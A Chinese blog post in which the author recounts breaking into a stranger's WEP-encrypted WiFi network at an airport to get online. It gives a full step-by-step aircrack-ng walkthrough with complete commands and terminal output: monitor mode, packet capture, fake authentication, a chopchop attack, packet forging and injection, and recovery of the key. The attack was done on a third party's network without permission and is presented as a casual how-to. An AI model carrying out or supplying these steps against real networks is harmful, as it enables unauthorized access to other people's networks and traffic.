使用Ubuntu进行无线破解过程

前几天在接女朋友,在机场接女朋友,因为有二个小时,自己坐在机场蛮无聊的,就想拿电脑上网,但发现,基本都是加密的,没有可以用的.所以没法子,只有强行来硬的啦.整个过程一共花了20分钟
我的环境是Ubuntu9.04.用的笔记本是IBM X200 无线网卡是Intel(R) WiFi Link
5100 AGN.在linux下面做这些真是太方便了.以下为整个无线破解的过程.
开启wlan为监听模式
fukai@fukai-laptop:~$ sudo airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
3316 NetworkManager
3335 wpa_supplicant
3340 avahi-daemon
3341 avahi-daemon
Interface Chipset Driver
mon0 Unknown iwlagn – [phy0]
(monitor mode enabled on mon0
开始抓包(这个终端不要关掉)
fukai@fukai-laptop:~$sudo airodump-ng -w chop.cap –ivs –channel 11 mon0
CH 11 ][ BAT: 1 hour 13 mins ][ Elapsed: 19 mins ][ 2009-04-13 22:17
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER
AUTH E
00:02:2D:B4:31:01 -55 0 10 0 0 1 11
OPN C
00:02:2D:B4:5D:8D -51 100 10723 199 0 11 11
OPN C
00:02:2D:B4:30:F6 -72 96 10393 206 0 11 11
OPN C
00:0F:B5:79:DD:DD -76 93 8306 24444 0 11 54 . WEP WEP
OPN U
00:02:2D:B4:30:F2 -82 2 1463 46 0 6 11
OPN C
00:02:2D:B4:5D:78 -74 0 5 0 0 1 11
OPN C
00:02:2D:B4:31:5A -76 0 6 0 0 1 11
OPN C
00:0D:97:04:90:49 -76 0 0 1 0 1 54 . WPA2 CCMP
PSK S
00:02:2D:B4:5D:64 -80 0 8 0 0 1 11
OPN C
BSSID STATION PWR Rate Lost Packets Probes
00:0F:B5:79:DD:DD 00:21:5D:90:E9:0A 0 1 - 0 0 129203
00:02:2D:B4:30:F2 00:16:EA:E1:57:44 -87 2 - 1 0 22
(not associated) 00:1C:B3:1C:BA:D0 -72 0 - 1 0 17
^C
进行FakeAuth攻击(我原来的x60到这步就死机)
fukai@fukai-laptop:~$ sudo aireplay-ng -1 0 -a 00:0F:B5:79:DD:DD -h
00:21:5d:90:e9:0a mon0
注:-h为主机MAC地址 -a为需要破解的无线AP的地址
21:59:31 Waiting for beacon frame (BSSID: 00:0F:B5:79:DD:DD) on channel 11
21:59:31 Sending Authentication Request (Open System) [ACK]
21:59:31 Authentication successful
21:59:31 Sending Association Request [ACK]
21:59:31 Association successful (AID: 1)
进行Chopchop攻击
fukai@fukai-laptop:~$ sudo aireplay-ng -4 -b 00:0F:B5:79:DD:DD -h
00:21:5d:90:e9:0a mon0
22:00:05 Waiting for beacon frame (BSSID: 00:0F:B5:79:DD:DD) on channel 11
Read 2507 packets…
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:0F:B5:79:DD:DD
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:79:DD:DD
0×0000: 0842 0000 ffff ffff ffff 000f b579 0498 .B………..y..
0×0010: 000f b579 0498 005a 6772 0400 6e0c 067f …y…Zgr..n..
0×0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab |…..1.&…^P..
0×0030: 3a1f 1b56 fca2 14f0 6f62 7d0b c94e 9d83 :..V….ob}..N..
0×0040: fca4 5e17 703f f414 828d bd8c 8d21 a2bc ..^.p?…….!..
0×0050: 8767 f385 61cc .g..a.
Use this packet ? y
Saving chosen packet in replay_src-0413-220115.cap
Offset 85 ( 0% done) | xor = F9 | pt = 35 | 92 frames written in
1569ms
Offset 84 ( 1% done) | xor = 82 | pt = E3 | 33 frames written in
561ms
Offset 83 ( 3% done) | xor = 63 | pt = E6 | 141 frames written in
2404ms
Offset 82 ( 5% done) | xor = 77 | pt = 84 | 198 frames written in
3373ms
Offset 81 ( 7% done) | xor = 67 | pt = 00 | 69 frames written in
1166ms
Offset 80 ( 9% done) | xor = 87 | pt = 00 | 3 frames written in
50ms
Offset 79 (11% done) | xor = BC | pt = 00 | 461 frames written in
7840ms
Offset 78 (13% done) | xor = A2 | pt = 00 | 452 frames written in
7665ms
Offset 77 (15% done) | xor = 21 | pt = 00 | 156 frames written in
2660ms
Offset 76 (17% done) | xor = 8D | pt = 00 | 256 frames written in
4360ms
Offset 75 (19% done) | xor = 8C | pt = 00 | 31 frames written in
519ms
Offset 74 (21% done) | xor = BD | pt = 00 | 12 frames written in
211ms
Offset 73 (23% done) | xor = 8D | pt = 00 | 681 frames written in
11572ms
Offset 72 (25% done) | xor = 82 | pt = 00 | 231 frames written in
3936ms
Offset 71 (26% done) | xor = 14 | pt = 00 | 126 frames written in
2148ms
Offset 70 (28% done) | xor = F4 | pt = 00 | 359 frames written in
6085ms
Offset 69 (30% done) | xor = 3F | pt = 00 | 143 frames written in
2443ms
Offset 68 (32% done) | xor = 70 | pt = 00 | 253 frames written in
4307ms
Offset 67 (34% done) | xor = 17 | pt = 00 | 70 frames written in
1182ms
Offset 66 (36% done) | xor = 5E | pt = 00 | 100 frames written in
1691ms
Offset 65 (38% done) | xor = A4 | pt = 00 | 164 frames written in
2779ms
Offset 64 (40% done) | xor = FC | pt = 00 | 1101 frames written in
18689ms
Offset 63 (42% done) | xor = E6 | pt = 65 | 1054 frames written in
17906ms
Offset 62 (44% done) | xor = 9D | pt = 00 | 226 frames written in
3819ms
Offset 61 (46% done) | xor = E6 | pt = A8 | 181 frames written in
3076ms
Offset 60 (48% done) | xor = 09 | pt = C0 | 16 frames written in
271ms
Offset 59 (50% done) | xor = 0B | pt = 00 | 55 frames written in
939ms
Offset 58 (51% done) | xor = 7D | pt = 00 | 71 frames written in
1197ms
Offset 57 (53% done) | xor = 62 | pt = 00 | 228 frames written in
3860ms
Offset 56 (55% done) | xor = 6F | pt = 00 | 331 frames written in
5626ms
Offset 55 (57% done) | xor = F0 | pt = 00 | 198 frames written in
3354ms
Offset 54 (59% done) | xor = 14 | pt = 00 | 64 frames written in
1089ms
Offset 53 (61% done) | xor = A3 | pt = 01 | 246 frames written in
4174ms
Offset 52 (63% done) | xor = FC | pt = 00 | 754 frames written in
12819ms
Offset 51 (65% done) | xor = FE | pt = A8 | 102 frames written in
1721ms
Offset 50 (67% done) | xor = DB | pt = C0 | 42 frames written in
721ms
Offset 49 (69% done) | xor = 87 | pt = 98 | 97 frames written in
1645ms
Offset 48 (71% done) | xor = 3E | pt = 04 | 47 frames written in
797ms
Offset 47 (73% done) | xor = D2 | pt = 79 | 63 frames written in
1064ms
Offset 46 (75% done) | xor = 51 | pt = B5 | 252 frames written in
4252ms
Offset 45 (76% done) | xor = 5F | pt = 0F | 108 frames written in
1828ms
Offset 44 (78% done) | xor = 5E | pt = 00 | 241 frames written in
4074ms
Offset 43 (80% done) | xor = F2 | pt = 01 | 193 frames written in
3257ms
Offset 42 (82% done) | xor = 03 | pt = 00 | 1126 frames written in
19048ms
Offset 41 (84% done) | xor = 18 | pt = 04 | 420 frames written in
7191ms
Offset 40 (86% done) | xor = 20 | pt = 06 | 586 frames written in
9941ms
Offset 39 (88% done) | xor = F1 | pt = 00 | 394 frames written in
6683ms
Offset 38 (90% done) | xor = 39 | pt = 08 | 228 frames written in
3868ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 1015 frames written in
17194ms
Offset 36 (94% done) | xor = FF | pt = 00 | 282 frames written in
4801ms
Offset 35 (96% done) | xor = F8 | pt = 06 | 1830 frames written in
31105ms
Sent 2386 packets, current guess: 48…
The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.
Saving plaintext in replay_dec-0413-220624.cap
Saving keystream in replay_dec-0413-220624.xor
Completed in 303s (0.16 bytes/s)
使用tcpdump查看生成的CAP文件内容
fukai@fukai-laptop:~$ tcpdump -s 0 -n -e -r replay_dec-0413-220624.cap
reading from file replay_dec-0413-220624.cap, link-type IEEE802_11 (802.11)
22:06:24.530668 DA:ff:ff:ff:ff:ff:ff BSSID:00:0F:B5:79:DD:DD
SA:00:0F:B5:79:DD:DD LLC, dsap SNAP (0xaa) Individual, ssap SNAP (0xaa)
Command, ctrl 0×03: oui Ethernet (0×000000), ethertype ARP (0×0806): arp
who-has 192.168.0.101 tell 192.168.0.1
构造注入包
root@mickey:/home/mickey# packetforge-ng -0 -a 00:1D:0F:72:A0:3C -h
00:1C:BF:6A:E1:E9 -k 255.255.255.255 -l 255.255.255.255 -y
replay_dec-0204-000647.xor -w fvck.cap
Wrote packet to: fvck.cap
同时进行Interactive Attack攻击
fukai@fukai-laptop:~$ sudo packetforge-ng -0 -a 00:0F:B5:79:DD:DD -h
00:21:5d:90:e9:0a -k 255.255.255.255 -l 255.255.255.255 -y
replay_dec-0413-220624.xor -w fvck.cap
Wrote packet to: fvck.cap
fukai@fukai-laptop:~$ sudo aireplay-ng -2 -r fvck.cap mon0
No source MAC (-h) specified. Using the device MAC (00:21:5D:90:E9:0A)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:0F:B5:79:DD:DD
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:5D:90:E9:0A
0×0000: 0841 0201 000f b579 0498 0021 5d90 e90a .A…..y…!]…
0×0010: ffff ffff ffff 8001 6772 0400 6e0c 067f ……..gr..n..
0×0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e7e 0c42 |…..1.&…^~.B
0×0030: d78d 2401 035c 14f0 6f62 7d0b f619 6219 ..$..\..ob}…b.
0×0040: e060 df45 .`.E
Use this packet ? y
Saving chosen packet in replay_src-0413-220845.cap
You should also start airodump-ng to capture replies.
End of file.
破解
fukai@fukai-laptop:~$ sudo aircrack-ng *.ivs
Aircrack-ng 1.0 rc3
[00:00:02] Tested 296 keys (got 15985 IVs)
KB depth byte(vote)
0 5/ 6 01(20224) 00(19968) 61(19968) 06(19712) 7B(19712)
1 3/ 5 0F(20736) 24(20480) 99(20480) CD(20480) 0D(20224)
2 0/ 2 45(23040) 17(22272) 41(20992) B2(20992) 52(20736)
3 0/ 1 67(25600) 3E(20992) B3(20992) 57(20224) 76(20224)
4 4/ 5 89(20480) 82(20224) 4B(19968) 81(19968) E6(19712)
KEY FOUND! [ 01:23:45:67:89 ]
Decrypted correctly: 100%

你可能感兴趣的:(ubuntu)